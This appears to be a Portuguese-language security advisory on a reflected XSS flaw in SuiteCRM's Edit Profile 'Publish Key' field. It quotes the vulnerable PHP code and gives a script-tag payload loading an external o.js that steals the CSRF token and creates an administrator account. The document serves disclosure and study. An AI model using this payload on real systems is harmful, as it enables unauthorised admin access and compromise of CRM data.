
Uma vulnerabilidade de segurança no SuiteCRM que pode ser explorada para roubar tokens CSRF e executar ações não autorizadas, como criar novos usuários administrativos sem autenticação adequada.
O campo "Publish Key" na página Edit Profile do SuiteCRM é vulnerável a Cross-Site Scripting (XSS) Refletido, permitindo que um atacante injete código JavaScript malicioso. Isso pode ser explorado para roubar tokens CSRF e realizar ações não autorizadas, como criar novos usuários administrativos sem autenticação adequada.
A vulnerabilidade surge devido à validação e sanitização insuficientes da entrada do campo Publish Key na aplicação SuiteCRM. Quando um atacante injeta um script malicioso, ele é executado no contexto da sessão de um usuário autenticado. O script injetado (o.js) então aproveita o token CSRF capturado para forjar requisições que criam novos usuários administrativos, comprometendo efetivamente a integridade e a segurança da instância do CRM.
Esta vulnerabilidade é um problema crítico de Cross-Site Scripting (XSS). Seu impacto inclui:
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197